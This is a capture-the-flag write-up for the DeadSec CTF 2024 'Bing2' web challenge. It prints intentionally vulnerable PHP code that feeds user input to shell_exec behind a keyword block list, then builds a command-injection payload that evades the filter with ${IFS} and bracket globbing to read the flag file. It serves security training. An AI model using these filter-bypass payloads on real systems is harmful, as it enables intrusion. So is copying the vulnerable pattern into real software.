DeadSec CTF 2024 | Bing2 (Web, Command Injection)

Difficulty : Medium

Let's start by reading the code.

<?php

if (isset($_POST['Submit'])) {
	$target = trim($_REQUEST['ip']);

	$substitutions = array(
		' ' => '',
		'&'  => '',
		'&&' => '',
		'('  => '',
		')'  => '',
		'-'  => '',
		'`'  => '',
		'|' => '',
		'||' => '',
		'; ' => '',	
		'%' => '',
		'~' => '',
		'<' => '',
		'>' => '',
		'/ ' => '',
		'\\' => '',
		'ls' => '',
        'cat' => '',
        'less' => '',
        'tail' => '',
        'more' => '',
        'whoami' => '',
        'pwd' => '',
        'busybox' => '',
        'nc' => '',
        'exec' => '',
        'sh' => '',
        'bash' => '',
        'php' => '',
        'perl' => '',
        'python' => '',
        'ruby' => '',
        'java' => '',
        'javac' => '',
        'gcc' => '',
        'g++' => '',
        'make' => '',
        'cmake' => '',
        'nmap' => '',
        'wget' => '',
        'curl' => '',
        'scp' => '',
        'ssh' => '',
        'ftp' => '',
        'telnet' => '',
        'dig' => '',
        'nslookup' => '',
        'iptables' => '',
        'chmod' => '',
        'chown' => '',
        'chgrp' => '',
        'kill' => '',
        'killall' => '',
        'service' => '',
        'systemctl' => '',
        'sudo' => '',
        'su' => '',
        'flag' => '',
	);

	$target = str_replace(array_keys($substitutions), $substitutions, $target);

	if (stristr(php_uname('s'), 'Windows NT')) {
		$cmd = shell_exec('ping  ' . $target);
	} else {
		$cmd = shell_exec('ping  -c 4 ' . (string)$target);
        echo $cmd;
        }
    }

So we need the Submit argument and the IP argument, the ip would contain our command injection.

For the submit you can just add the argument but sometimes it won't work if it doesn't come from a form, you can just create a form in the main page.

<form method="post" action="bing.php">
  <input type="Submit" name="Submit" value="Submit" class="btn btn-success">
</form>

This is the payload we need to run but would need to modify in order to bypass the filters

localhost; /bin/cat /flag.txt;

For spaces we can use ${IFS} and to bypass cat and flag we can use ca[t] and fla[g]

localhost;${IFS}/bin/ca[t]${IFS}/fla[g].txt;

this would run but display nothing, that's because of the shell_exec function that will return null if there is an error or the command doesn't return true, so we would need to force a true response after each command.

In the end our final payload looks like this.

localhost${IFS};${IFS}echo${IFS}$?;${IFS}/bin/ca[t]${IFS}/fla[g].txt${IFS}true;${IFS}echo${IFS}$?;

In the end we pass it in Burpsuite and get our flag.

PreviousCTFZONE Quals 2024 | Youtube Unlock & Youtube Unlock Revenge (GGC Exploit)NextMOCA CTF - QUALS 2024 | RaaS (Web, XSS)

Last updated